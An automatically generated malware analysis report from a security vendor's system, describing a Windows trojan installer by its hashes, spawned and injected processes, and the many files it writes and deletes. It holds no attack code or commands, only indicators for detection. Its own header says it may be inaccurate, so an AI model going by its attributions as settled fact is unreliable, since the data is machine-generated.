Trojan.NSIS.StartPage_4ef0a3733f

by malwarelabrobot on November 8th, 2015 in Malware Descriptions.

Trojan.NSIS.StartPage.FD, Trojan.Win32.IEDummy.FD, mzpefinder_pcap_file.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Banker, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 4ef0a3733fc5a67cf2f092543e147b35
SHA1: faaf987b561e20472df41e1212eefa0d7b4ee66e
SHA256: 6c1fccf0dabb305645fbd5c94fbb20edeb24fe9ba33a74ed0616db0213e91019
SSDeep: 196608:/5nXAPYOn5M6jOlYBjuc8xJDKtBP0vucdOsI YVQMqmQUxPPcULmswJ3W7ixKk9S:xnAYSMw 0unXnvv0TsuPPTwJG7/koNWO
Size: 13738518 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2010-04-10 15:19:23
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

9158chat2_ktv088_63.exe:2116
sr.exe:244
9158IE.exe:3116
xianfengkunbang.exe:1324
BaiduP2PService.exe:252
BaiduP2PService.exe:472
RsMgrSvc.exe:1936
regsvr32.exe:2380
regsvr32.exe:2448
regsvr32.exe:2328
regsvr32.exe:2480
9158.exe:3012
popwndexe.exe:760
xianfengupdate.exe:660
%original file name%.exe:1736

The Trojan injects its code into the following process(es):

MM-liao8863.exe:2808
xianfeng.exe:272
QQPCDownload71960.exe:2776
install1393485.exe:1148

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process 9158chat2_ktv088_63.exe:2116 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Start Menu\Programs\9158¶àÈËÊÓƵ\жÔØ 9158¶àÈËÊÓƵ.lnk (715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading2.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading1.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step1.bmp (22192 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\9158¶àÈËÊÓƵ\9158¶àÈËÊÓƵ.lnk (707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install.bmp (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\close.bmp (824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step2.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step3.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\return.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\finish.bmp (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox2.bmp (3 bytes)
%Documents and Settings%\%current user%\Desktop\9158¶àÈËÊÓƵ.lnk (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc11.tmp (1012028 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\custom.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox1.bmp (3 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading2.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\finish.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\custom.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading1.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\close.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step3.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\return.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step2.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox2.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step1.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\SkinBtn.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox1.bmp (0 bytes)

The process sr.exe:244 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\install.txt (344 bytes)

The process xianfengkunbang.exe:1324 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\nsTools.dll (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr8.tmp (48917 bytes)
%Program Files%\tools\BaiduP2PService.exe (17848 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\System.dll (11 bytes)
%Program Files%\tools\P2PStatReport.dll (12536 bytes)
%Program Files%\tools\P2SBase.dll (18424 bytes)
%Program Files%\tools\P2PBase.dll (17848 bytes)
%Program Files%\tools\sr.exe (5520 bytes)

The Trojan deletes the following file(s):

%Program Files%\tools\isWrite (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\nsTools.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\System.dll (0 bytes)

The process MM-liao8863.exe:2808 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M9YNOH2J\xui[1].js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OZ0N258D\CA4PMRS9.htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M9YNOH2J\CAURKDUJ.htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OZ0N258D\icons[1].gif (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\Opendownloadernewxml[1].htm (899 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6N8PMZAJ\Downloaderconfig[1].htm (948 bytes)
%Program Files%\9158ktv\DownLoad\9158chat2_ktv088_63.exe.tmp (121120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\CA8HUBK5.htm (764 bytes)
C:\temp.icon (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6N8PMZAJ\main[1].ico (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\1[1].swf (48341 bytes)

The process BaiduP2PService.exe:472 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\62B5AF9BE9ADC1085C3C56EC07A82BF6 (148 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabA.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabE.tmp (50 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabC.tmp (54 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe.bdtp (158659 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe.bdre (1040 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarD.tmp (2712 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe.bdtp (117549 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\ch_dl_url.exe.bdre (2840 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\ch_dl_url.exe.bdtp (412553 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarB.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe.bdre (892 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (50 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\bdsecushr.dat (3628 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 (224 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe.bdtp (568599 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\tasks.dat (2420 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe.bdre (2124 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarF.tmp (2712 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\TarD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarB.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe.bdre (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe.bdre (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabA.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe.bdre (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\tasks.ini (0 bytes)

The process xianfeng.exe:272 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\ioSpecial.ini (1796 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\modern-wizard.bmp (26 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp (0 bytes)

The process RsMgrSvc.exe:1936 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Rising\RSD\RsMgrSvc.exe.log (367 bytes)
%Program Files%\Rising\RSD\RsMgrSvc.dat (708 bytes)

The process QQPCDownload71960.exe:2776 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDetector.dll (5257 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\QQPCMgr_Setup.exe (454597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\setup.xml (580 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\version (672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDownload.dll (9775 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\qmdr\dr.dll (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDownload.kui (1661 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\version (0 bytes)

The process install1393485.exe:1148 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ui\snin.htm (527 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\rsmon.db1 (43 bytes)
%Program Files%\Rising\RSD\RsMgrSvc.exe (673 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsdinfo.dll (601 bytes)
%Program Files%\Rising\RSD\RsMgrsvc.ini (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.rstray (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\moncom08.dll (443 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\moncomm.dll (1222 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\sysmon.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\label.dat (384 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\datastorage.db (19 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CfgDll.dll (701 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\comx3.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCFG\rscfg.dll (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.dll (1353 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\lics936.txt (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rscommx2.dll (479 bytes)
%Program Files%\Rising\RSD\XMLS\RSSetup.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsMgrSvc.exe (1855 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\uprsuser.dat (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard.sys (1707 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCFG\RSCFG.xml (996 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD932\Jpn.lag (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\os.xml (685 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\Setup.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3w.dll (1848 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\RAVMON.xml (574 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\_rav\_rav.xml (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\comx3.dll (709 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\monbasedui.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\RAVCONFIG.xml (518 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RstoreDll.dll (953 bytes)
%Program Files%\Rising\RSD\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\selfmon.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\url.ini (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\atl90.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.mond (485 bytes)
%Program Files%\RsTest.ini (14 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\os.xml (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravxp\ravxp.exe (86 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\ravconfig.xml (518 bytes)
%Program Files%\Rising\RSD\updater.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudnotifier.dll (2752 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\12345678.000 (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.ATL.manifest (466 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\uprsmon.dat (45 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\dfw.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils.sys (734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CompsVer.inf (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\LogDc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Setup.exe (8063 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsndisp.sys (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\ravbase.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\userdata.mond (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\setup.dll (3859 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\LogAc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudv3.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RavSetup.dll (7433 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVXP\RAVXP.xml (404 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bacore.dll (2321 bytes)
%Program Files%\Rising\RSD\setup.dat (601 bytes)
%Program Files%\Rising\RSD\rslang.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravlog\ravlog.xml (545 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rslang.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsndisp.sys (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\mscrt9.xml (961 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rscom.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\comx3.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\chs.lag (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\rsmondef.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\CfgDll.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\rsmain.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\defmon.dll (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVXP\ravxp.exe (601 bytes)
%Program Files%\Rising\RSD\ui\snin.htm (527 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\cnt09.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bawhite.dat (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\mergexml.dll (117 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\Cloudv3.dll (4727 bytes)
%Program Files%\Rising\RSD\rsmginfo.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravlog\rslog.dll (25 bytes)
%Program Files%\Rising\RSD\comx3.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\LogDc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\comx3.dll (693 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.CRT.manifest (496 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rslang.dll (1655 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\ravmon.xml (574 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\adefmon.mond (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\localopt.dll (2190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\mond.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\url.ini (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravxp\ravxp.xml (404 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsdll.dll.dat (601 bytes)
%Program Files%\Rising\RSD\os.xml (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg (48 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\userdata.rstray (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Custom.xml (775 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.mondcoms (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSSETUP.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rssqlite.dll (4311 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\monrule.dll (211 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\mondcoms.xml (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\lics936.txt (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\chs.lag (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\atl90.dll (1254 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsutils_if.dll (58 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\setup.dat (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon.sys (2740 bytes)
%System%\drivers\protreg.sys (24 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\localopt.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rscurl.dll (3126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudnet.dll (2054 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\protreg.sys (24 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsBackup.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.mond (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\Rising.ico (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rscomm.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RAVBASE.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\rsutils.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\rstask.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSSetup.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\c[1].aspx (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\procenv.dll (29 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\CLOUDV3.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsStub.exe (1762 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\license.xml (347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\syslay.dll (316 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\cnt08.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\updater.exe (7115 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\dataups.dat (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Rav.7z (22865 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\Microsoft.VC90.CRT.manifest (496 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\ravmaindui.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\msvcp90.dll (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\msvcr90.dll (4185 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudwork.dll (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\datastorage.db (19 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bawhite.dat (22 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\traywnd.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\_RAV\setup.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\Cloudv3.dll (3073 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsutils.sys (601 bytes)
%Program Files%\Rising\RSD\RSD932\Jpn.lag (37 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\setup.dat (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\protreg.sys (24 bytes)
%Program Files%\Rising\RSD\update.xml (164 bytes)
%Program Files%\Rising\RSD\popwndexe.exe (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\RsBaseNetWrapper.dll (48 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\RSMONDEF.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsTray.ico (601 bytes)
%Program Files%\Rising\RSD\Data\RAV\RAV.ini (50 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\update.xml (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\update.xml (164 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\Proccomm.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\RSDK.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVLOG\RAVLOG.xml (545 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\moncom08.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\_RAV\_RAV.xml (368 bytes)
%Program Files%\Rising\RSD\RsAppMgr.dll (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\pngdll.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD1252\Eng.lag (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmginfo.dll (1115 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\syslay.dll (26 bytes)
%Program Files%\Rising\RSD\RsStub.exe (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RAV.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\rspalvd.dll (1411 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RavSetup.dll (12014 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rscombas.dll (2035 bytes)
